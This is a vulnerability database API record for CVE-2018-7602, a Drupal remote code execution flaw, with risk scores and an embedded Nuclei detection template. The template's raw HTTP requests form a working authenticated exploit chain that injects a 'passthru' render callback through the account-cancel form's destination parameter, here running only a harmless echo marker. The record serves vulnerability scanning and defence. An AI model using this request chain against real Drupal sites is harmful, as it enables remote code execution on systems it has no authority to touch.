{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-7602/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-7602/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-7602/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-7602/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-7602/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-7602"},"sightings":{"href":"/api/v1/sightings/cve-2018-7602"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99205,"kev":true,"percentile":0.99934},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-7602.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-7602\n\ninfo:\n  name: Drupal - Remote Code Execution\n  author: princechaddha\n  severity: critical\n  description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.\n  impact: |\n    Remote attackers can execute arbitrary code on the affected Drupal installations.\n  remediation: |\n    Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal.\n  reference:\n    - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-7602\n    - https://www.drupal.org/sa-core-2018-004\n    - https://www.exploit-db.com/exploits/44557/\n    - http://www.securitytracker.com/id/1040754\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-7602\n    epss-score: 0.99205\n    epss-percentile: 0.99934\n    cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 4\n    vendor: drupal\n    product: drupal\n    shodan-query:\n      - http.component:\"drupal\"\n      - cpe:\"cpe:2.3:a:drupal:drupal\"\n  tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /?q=user%2Flogin HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        form_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n      - |\n        GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n      - |\n        POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        form_build_id={{form_build_id}}\n\n    host-redirects: true\n    max-redirects: 2\n    matchers:\n      - type: word\n        words:\n          - 'CVE-2018-7602-POC'\n\n    extractors:\n      - type: regex\n        name: userid\n        group: 1\n        regex:\n          - '<meta about=\"([/a-z0-9]+)\" property=\"foaf'\n        internal: true\n        part: body\n\n      - type: regex\n        name: form_token\n        group: 1\n        regex:\n          - '<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />'\n        internal: true\n        part: body\n\n      - type: regex\n        name: form_build_id\n        group: 1\n        regex:\n          - '<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />'\n        internal: true\n        part: body\n# digest: 490a00463044022006dde7bf7df14e43757a0c22c8563adbee834e91e2c461abc78da93a2be14f8502206b38b5be8fc77f40d44734eb86d661f53a7d1c3bdd4d0208d4de9ada8e1e0aa2:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2018-7602"}